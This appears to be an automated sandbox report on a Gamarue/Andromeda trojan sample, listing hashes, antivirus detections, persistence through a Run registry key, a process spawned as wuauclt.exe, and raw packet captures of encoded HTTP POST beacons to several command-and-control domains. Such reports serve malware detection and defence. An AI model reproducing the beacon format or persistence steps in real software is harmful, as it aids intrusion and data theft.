| Analysis Date | 2015-04-07 20:40:13 |
|---|---|
| MD5 | d5cbfd255e211bf2ae80442bed6b9e74 |
| SHA1 | 612f0792bf90af3b50dd7a7ea4dee537cb001588 |
Static Details:
| File type | PE32 executable for MS Windows (GUI) Intel 80386 32-bit | |
|---|---|---|
| Section | .text md5: d88ab40f2a5389c79b9a18a4427b074b sha1: 3d4b635b6f4ab78baf6db2824611f8946b7dd22b size: 31744 | |
| Section | .rdata md5: 593f1ed3d5ef7a5154a5ed2e64909c8c sha1: e04d4cbe6342a3dfc0e19104d8111c0708523429 size: 15360 | |
| Section | .data md5: 9cdd072d249de88c451022afdf42e43c sha1: 84cd1f08f5fbdd30d5b4b82bcd6fb3e1ffc49625 size: 9984 | |
| Timestamp | 2003-11-08 02:31:50 | |
| Pdb path | @ | |
| Packer | Microsoft Visual C++ 5.0 | |
| PEhash | d31ecdd5c6be30d478d51fa31196fa5e0d0f5c17 | |
| IMPhash | d71385a36f3ece46e335abdfdd5e1914 | |
| AV | 360 Safe | no_virus |
| AV | Ad-Aware | Trojan.Generic.9125644 |
| AV | Alwil (avast) | Malware-gen:Win32:Malware-gen |
| AV | Arcabit (arcavir) | Trojan.Generic.9125644 |
| AV | Authentium | W32/Trojan.PSTD-9354 |
| AV | Avira (antivir) | Worm/Gamarue.A.541 |
| AV | BullGuard | Trojan.Generic.9125644 |
| AV | CA (E-Trust Ino) | Win32/Gamarue.IP |
| AV | CAT (quickheal) | Trojan.Generic.r3 |
| AV | ClamAV | no_virus |
| AV | Dr. Web | BackDoor.Andromeda.22 |
| AV | Emsisoft | Trojan.Generic.9125644 |
| AV | Eset (nod32) | Win32/TrojanDownloader.Wauchos.A |
| AV | Fortinet | W32/Zbot.PKJO!tr |
| AV | Frisk (f-prot) | W32/Trojan2.OAQL |
| AV | F-Secure | Trojan.Generic.9125644 |
| AV | Grisoft (avg) | BackDoor.Generic16.CITK |
| AV | Ikarus | Trojan.SuspectCRC |
| AV | K7 | Trojan ( 001d712b1 ) |
| AV | Kaspersky 2015 | Trojan.Win32.Generic |
| AV | MalwareBytes | Trojan.Downloader.W |
| AV | Mcafee | no_virus |
| AV | Microsoft Security Essentials | Worm:Win32/Gamarue |
| AV | MicroWorld (escan) | Trojan.Generic.9125644 |
| AV | Rising | no_virus |
| AV | Sophos | W32/Gamarue-AW |
| AV | Symantec | no_virus |
| AV | Trend Micro | no_virus |
| AV | VirusBlokAda (vba32) | Backdoor.Androm |
Runtime Details:
| Screenshot |  |
|---|
Process
↳ C:\malware.exe
| Creates Process | C:\WINDOWS\system32\wuauclt.exe |
|---|
Process
↳ C:\WINDOWS\system32\wuauclt.exe
| Registry | HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\Policies\Explorer\Run\36874 ➝ C:\Documents and Settings\All Users\Local Settings\Temp\msipeuq.scr\\x00 |
|---|---|
| Creates File | C:\Documents and Settings\All Users\Local Settings\Temp\msipeuq.scr |
| Creates File | PIPE\lsarpc |
| Creates File | \Device\Afd\Endpoint |
| Deletes File | C:\612F07~1.EXE |
| Creates Mutex | 3227095050 |
Network Details:
| DNS | www.update.microsoft.com.nsatc.net Type: A 134.170.58.222 |
|---|---|
| DNS | www.update.microsoft.com.nsatc.net Type: A 134.170.58.221 |
| DNS | xdqzpbcgrvkj.ru Type: A 195.22.26.253 |
| DNS | xdqzpbcgrvkj.ru Type: A 195.22.26.254 |
| DNS | xdqzpbcgrvkj.ru Type: A 195.22.26.231 |
| DNS | xdqzpbcgrvkj.ru Type: A 195.22.26.252 |
| DNS | anam0rph.su Type: A 195.22.26.231 |
| DNS | anam0rph.su Type: A 195.22.26.252 |
| DNS | anam0rph.su Type: A 195.22.26.253 |
| DNS | anam0rph.su Type: A 195.22.26.254 |
| DNS | orzdwjtvmein.in Type: A 50.63.202.67 |
| DNS | ygiudewsqhct.in Type: A 69.195.129.74 |
| DNS | somicrososoft.ru Type: A 195.154.181.124 |
| DNS | www.update.microsoft.com Type: A |
| DNS | bdcrqgonzmwuehky.nl Type: A |
| HTTP POST | http://xdqzpbcgrvkj.ru/in.php User-Agent: Mozilla/4.0 |
| HTTP POST | http://anam0rph.su/in.php User-Agent: Mozilla/4.0 |
| HTTP POST | http://orzdwjtvmein.in/in.php User-Agent: Mozilla/4.0 |
| HTTP POST | http://ygiudewsqhct.in/in.php User-Agent: Mozilla/4.0 |
| HTTP POST | http://somicrososoft.ru/in.php User-Agent: Mozilla/4.0 |
| Flows TCP | 192.168.1.1:1031 ➝ 134.170.58.222:80 |
| Flows UDP | 192.168.1.1:1032 ➝ 8.8.4.4:53 |
| Flows TCP | 192.168.1.1:1033 ➝ 195.22.26.253:80 |
| Flows UDP | 192.168.1.1:1034 ➝ 8.8.4.4:53 |
| Flows TCP | 192.168.1.1:1035 ➝ 195.22.26.231:80 |
| Flows UDP | 192.168.1.1:1036 ➝ 8.8.4.4:53 |
| Flows TCP | 192.168.1.1:1037 ➝ 50.63.202.67:80 |
| Flows UDP | 192.168.1.1:1038 ➝ 8.8.4.4:53 |
| Flows TCP | 192.168.1.1:1039 ➝ 69.195.129.74:80 |
| Flows UDP | 192.168.1.1:1040 ➝ 8.8.4.4:53 |
| Flows UDP | 192.168.1.1:1041 ➝ 8.8.4.4:53 |
| Flows TCP | 192.168.1.1:1042 ➝ 195.154.181.124:80 |
Raw Pcap
0x00000000 (00000) 504f5354 202f696e 2e706870 20485454 POST /in.php HTT 0x00000010 (00016) 502f312e 310d0a48 6f73743a 20786471 P/1.1..Host: xdq 0x00000020 (00032) 7a706263 6772766b 6a2e7275 0d0a5573 zpbcgrvkj.ru..Us 0x00000030 (00048) 65722d41 67656e74 3a204d6f 7a696c6c er-Agent: Mozill 0x00000040 (00064) 612f342e 300d0a43 6f6e7465 6e742d54 a/4.0..Content-T 0x00000050 (00080) 7970653a 20617070 6c696361 74696f6e ype: application 0x00000060 (00096) 2f782d77 77772d66 6f726d2d 75726c65 /x-www-form-urle 0x00000070 (00112) 6e636f64 65640d0a 436f6e74 656e742d ncoded..Content- 0x00000080 (00128) 4c656e67 74683a20 38340d0a 436f6e6e Length: 84..Conn 0x00000090 (00144) 65637469 6f6e3a20 636c6f73 650d0a0d ection: close... 0x000000a0 (00160) 0a757071 63684373 38764654 4b464f56 .upqchCs8vFTKFOV 0x000000b0 (00176) 6d6e494b 47497769 4c72486f 33567436 mnIKGIwiLrHo3Vt6 0x000000c0 (00192) 38543379 71766851 75325471 6574516e 8T3yqvhQu2TqetQn 0x000000d0 (00208) 33714979 37513662 70546644 55745949 3qIy7Q6bpTfDUtYI 0x000000e0 (00224) 66745a33 334e4230 444c7730 67396d59 ftZ33NB0DLw0g9mY 0x000000f0 (00240) 3371773d 3d 3qw== 0x00000000 (00000) 504f5354 202f696e 2e706870 20485454 POST /in.php HTT 0x00000010 (00016) 502f312e 310d0a48 6f73743a 20616e61 P/1.1..Host: ana 0x00000020 (00032) 6d307270 682e7375 0d0a5573 65722d41 m0rph.su..User-A 0x00000030 (00048) 67656e74 3a204d6f 7a696c6c 612f342e gent: Mozilla/4. 0x00000040 (00064) 300d0a43 6f6e7465 6e742d54 7970653a 0..Content-Type: 0x00000050 (00080) 20617070 6c696361 74696f6e 2f782d77 application/x-w 0x00000060 (00096) 77772d66 6f726d2d 75726c65 6e636f64 ww-form-urlencod 0x00000070 (00112) 65640d0a 436f6e74 656e742d 4c656e67 ed..Content-Leng 0x00000080 (00128) 74683a20 38340d0a 436f6e6e 65637469 th: 84..Connecti 0x00000090 (00144) 6f6e3a20 636c6f73 650d0a0d 0a757071 on: close....upq 0x000000a0 (00160) 63684373 38764654 4b464f56 6d6e494b chCs8vFTKFOVmnIK 0x000000b0 (00176) 47497769 4c72486f 33567436 38543379 GIwiLrHo3Vt68T3y 0x000000c0 (00192) 71766851 75325471 6574516e 33714979 qvhQu2TqetQn3qIy 0x000000d0 (00208) 37513662 70546644 55745949 66745a33 7Q6bpTfDUtYIftZ3 0x000000e0 (00224) 334e4230 444c7730 67396d59 3371773d 3NB0DLw0g9mY3qw= 0x000000f0 (00240) 3d71773d 3d =qw== 0x00000000 (00000) 504f5354 202f696e 2e706870 20485454 POST /in.php HTT 0x00000010 (00016) 502f312e 310d0a48 6f73743a 206f727a P/1.1..Host: orz 0x00000020 (00032) 64776a74 766d6569 6e2e696e 0d0a5573 dwjtvmein.in..Us 0x00000030 (00048) 65722d41 67656e74 3a204d6f 7a696c6c er-Agent: Mozill 0x00000040 (00064) 612f342e 300d0a43 6f6e7465 6e742d54 a/4.0..Content-T 0x00000050 (00080) 7970653a 20617070 6c696361 74696f6e ype: application 0x00000060 (00096) 2f782d77 77772d66 6f726d2d 75726c65 /x-www-form-urle 0x00000070 (00112) 6e636f64 65640d0a 436f6e74 656e742d ncoded..Content- 0x00000080 (00128) 4c656e67 74683a20 38340d0a 436f6e6e Length: 84..Conn 0x00000090 (00144) 65637469 6f6e3a20 636c6f73 650d0a0d ection: close... 0x000000a0 (00160) 0a757071 63684373 38764654 4b464f56 .upqchCs8vFTKFOV 0x000000b0 (00176) 6d6e494b 47497769 4c72486f 33567436 mnIKGIwiLrHo3Vt6 0x000000c0 (00192) 38543379 71766851 75325471 6574516e 8T3yqvhQu2TqetQn 0x000000d0 (00208) 33714979 37513662 70546644 55745949 3qIy7Q6bpTfDUtYI 0x000000e0 (00224) 66745a33 334e4230 444c7730 67396d59 ftZ33NB0DLw0g9mY 0x000000f0 (00240) 3371773d 3d 3qw== 0x00000000 (00000) 504f5354 202f696e 2e706870 20485454 POST /in.php HTT 0x00000010 (00016) 502f312e 310d0a48 6f73743a 20796769 P/1.1..Host: ygi 0x00000020 (00032) 75646577 73716863 742e696e 0d0a5573 udewsqhct.in..Us 0x00000030 (00048) 65722d41 67656e74 3a204d6f 7a696c6c er-Agent: Mozill 0x00000040 (00064) 612f342e 300d0a43 6f6e7465 6e742d54 a/4.0..Content-T 0x00000050 (00080) 7970653a 20617070 6c696361 74696f6e ype: application 0x00000060 (00096) 2f782d77 77772d66 6f726d2d 75726c65 /x-www-form-urle 0x00000070 (00112) 6e636f64 65640d0a 436f6e74 656e742d ncoded..Content- 0x00000080 (00128) 4c656e67 74683a20 38340d0a 436f6e6e Length: 84..Conn 0x00000090 (00144) 65637469 6f6e3a20 636c6f73 650d0a0d ection: close... 0x000000a0 (00160) 0a757071 63684373 38764654 4b464f56 .upqchCs8vFTKFOV 0x000000b0 (00176) 6d6e494b 47497769 4c72486f 33567436 mnIKGIwiLrHo3Vt6 0x000000c0 (00192) 38543379 71766851 75325471 6574516e 8T3yqvhQu2TqetQn 0x000000d0 (00208) 33714979 37513662 70546644 55745949 3qIy7Q6bpTfDUtYI 0x000000e0 (00224) 66745a33 334e4230 444c7730 67396d59 ftZ33NB0DLw0g9mY 0x000000f0 (00240) 3371773d 3d 3qw== 0x00000000 (00000) 504f5354 202f696e 2e706870 20485454 POST /in.php HTT 0x00000010 (00016) 502f312e 310d0a48 6f73743a 20736f6d P/1.1..Host: som 0x00000020 (00032) 6963726f 736f736f 66742e72 750d0a55 icrososoft.ru..U 0x00000030 (00048) 7365722d 4167656e 743a204d 6f7a696c ser-Agent: Mozil 0x00000040 (00064) 6c612f34 2e300d0a 436f6e74 656e742d la/4.0..Content- 0x00000050 (00080) 54797065 3a206170 706c6963 6174696f Type: applicatio 0x00000060 (00096) 6e2f782d 7777772d 666f726d 2d75726c n/x-www-form-url 0x00000070 (00112) 656e636f 6465640d 0a436f6e 74656e74 encoded..Content 0x00000080 (00128) 2d4c656e 6774683a 2038340d 0a436f6e -Length: 84..Con 0x00000090 (00144) 6e656374 696f6e3a 20636c6f 73650d0a nection: close.. 0x000000a0 (00160) 0d0a7570 71636843 73387646 544b464f ..upqchCs8vFTKFO 0x000000b0 (00176) 566d6e49 4b474977 694c7248 6f335674 VmnIKGIwiLrHo3Vt 0x000000c0 (00192) 36385433 79717668 51753254 71657451 68T3yqvhQu2TqetQ 0x000000d0 (00208) 6e337149 79375136 62705466 44557459 n3qIy7Q6bpTfDUtY 0x000000e0 (00224) 4966745a 33334e42 30444c77 3067396d IftZ33NB0DLw0g9m 0x000000f0 (00240) 59337177 3d3d Y3qw==
Strings
.....
DaDG
epal
meen
method, pro
o.e
rg D
RGe -
rNeA
sSsi
syee
Week Cha
y?I@
3Rj5d@
3Y;uAW
7a9){|
_adjust_fdiv
a-,Ect
aUUXSS
bA0+MM$$GGj2
c ivysi,
Cjj$$$$$
_controlfp
CreateFileW
C:\wear\Dark\wash\but\solve\Party\held\believethis.pdb
@.data
Dmo/?s
DSS_YMM
$e~$$$
e, bsd
EeaDe-
eec ulh
;EFEU$
Efuu|A@
e Tpnyi
$$eUUMM
eW) rnk,Yi
_except_handler3
- eyEhL I
faprM
fKr,w
fLeTr s
FMMUfMM
F$$nxjj
Fri icri
F vI3I
GetLocalTime
GetModuleHandleW
GetStartupInfoW
GetVolumeInformationW
GGPMM^
G rc
GUUo{|K7*
h Sn(d
IgOoC.R
i hd- at
_initterm
iot ia
Itauidigpt
$$$$jj
jj$$GG
jj*GSG$
jjXUUb
jVrjUU
KERNEL32.dll
k,He
,lInir
lu$e-$
l(ye R
lz@mo)
memcpy
memset
MM3+?*JR
MM$$GG
MMjjjju
MMM~$$
MMOMCMuC"u
;MMSSGGSdS
MMuuGGG]
MMWM^lMS
MM*wUU5
MS;Pxv
MSVCRT.dll
MtMjQ/j$$
,MTMM/M
m$$w:$
NiOottmx
n pSc.n
nuu$$SS
NzUU90
o h db
OIOe
on, sm
o o. s
o rd;s
__p__commode
__p__fmode
Qm" zF&
r Acon
Rcsit
.rdata
r rrsw
rtdSlr
$|r$uCUuSSZ
%[R@[X
ScriptApplyDigitSubstitution
ScriptApplyLogicalWidth
ScriptBreak
ScriptCacheGetHeight
ScriptFreeCache
ScriptGetGlyphABCWidth
ScriptIsComplex
ScriptItemize
ScriptJustify
ScriptLayout
ScriptPlace
ScriptRecordDigitSubstitution
ScriptShape
ScriptStringAnalyse
ScriptStringCPtoX
ScriptStringFree
ScriptStringGetLogicalWidths
ScriptStringGetOrder
ScriptStringOut
ScriptString_pLogAttr
ScriptStringValidate
ScriptStringXtoCP
ScriptTextOut
ScriptXtoCP
__set_app_type
SetSystemTimeAdjustment
__setusermatherr
SGG;N1
SjejSSv
srfnea
@s@sLC
SSSUUMM
Su$5$SS>
$s`$UUh-x
tc scMoe
!This program cannot be run in DOS mode.
tSb-rg
t$ub-et
tx3F3_x,
u$$D#MMY=
Uio R
UK}U$$T
U$/$MMH
USP10.dll
UTKUGG
$$UU$$
$U-U$$
uu$f$U'XUuu
$$$$UUG"Gu
$UUI7-
$$uu$$M
$$UUM"M
uuMMSSU
UUoUuu>$$(
v HeSo
VirtualProtectEx
_wcmdln
__wgetmainargs
$w$GxG
$$#wUU
W(zMMUU
+_:@=x
@x7%t+$M
_XcptFilter
x$$UUS
yGMMug
$y}$MM
Yroter
$$$ZUU6jj